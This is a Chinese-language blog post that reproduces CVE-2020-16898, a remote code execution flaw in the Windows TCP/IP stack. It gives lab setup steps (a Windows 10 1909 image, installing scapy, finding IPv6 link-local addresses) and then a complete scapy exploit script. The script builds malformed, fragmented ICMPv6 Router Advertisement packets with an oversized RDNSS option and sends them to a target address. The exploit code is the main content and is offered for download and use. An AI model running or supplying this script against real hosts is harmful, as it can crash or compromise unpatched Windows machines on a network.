(CVE-2020-16898)Windows TCP/IP远程执行代码漏洞 exp复现

释放双眼,带上耳机,听听看~!

CVE-2020-16898 微软TCP/IP远程执行代码漏洞

影响版本:

file

下载Windows 10 镜像
1909

ed2k://|file|cn_windows_10_business_editions_version_1909_x64_dvd_0ca83907.iso|5275090944|9BCD5FA6C8009E4D0260E4B23008BD47|/

测试版本:

file

安装scapy

pip3 install scapy 

获取目标机IPv6 地址

file

   IPv6 地址 . . . . . . . . . . . . : fd15:4ba5:5a2b:1008:940f:5491:31c4:c4ff
   临时 IPv6 地址. . . . . . . . . . : fd15:4ba5:5a2b:1008:8024:287d:cfc5:17e2
   本地链接 IPv6 地址. . . . . . . . : fe80::940f:5491:31c4:c4ff%7

任意均可

获取攻击机的IPv6 地址

file

  本地链接 IPv6 地址. . . . . . . . : fe80::588b:30b8:bc:589f%17

file

开始攻击

file

利用脚本下载:[wm_reply]

[wm_red]
from scapy.all import *
from scapy.layers.inet6 import ICMPv6NDOptEFA, ICMPv6NDOptRDNSS, ICMPv6ND_RA, IPv6, IPv6ExtHdrFragment, fragment6

v6_dst = "fe80::940f:5491:31c4:c4ff%7"
v6_src = "fe80::588b:30b8:bc:589f%17"

p_test_half = 'A'.encode()*8 + b"\x18\x30" + b"\xFF\x18"
p_test = p_test_half + 'A'.encode()*4

c = ICMPv6NDOptEFA()

e = ICMPv6NDOptRDNSS()
e.len = 21
e.dns = [
"AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]
aaa = ICMPv6NDOptRDNSS()
aaa.len = 8
pkt = ICMPv6ND_RA() / aaa / \
Raw(load='A'.encode()*16*2 + p_test_half + b"\x18\xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e

p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/ \
IPv6ExtHdrFragment()/pkt

l=fragment6(p_test_frag, 200)

for p in l:
send(p)
[/wm_red]

[/wm_reply]

声明:本站所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。

给TA打赏
共{{data.count}}人
人已打赏
渗透测试神兵利器

盘的访问密码

2020-10-16 8:37:39

CVE漏洞利用库神兵利器

渗透测试小tips,有脑就能学废

2020-10-21 10:29:07

22 条回复 A文章作者 M管理员
个人中心
今日签到
有新私信 私信列表
搜索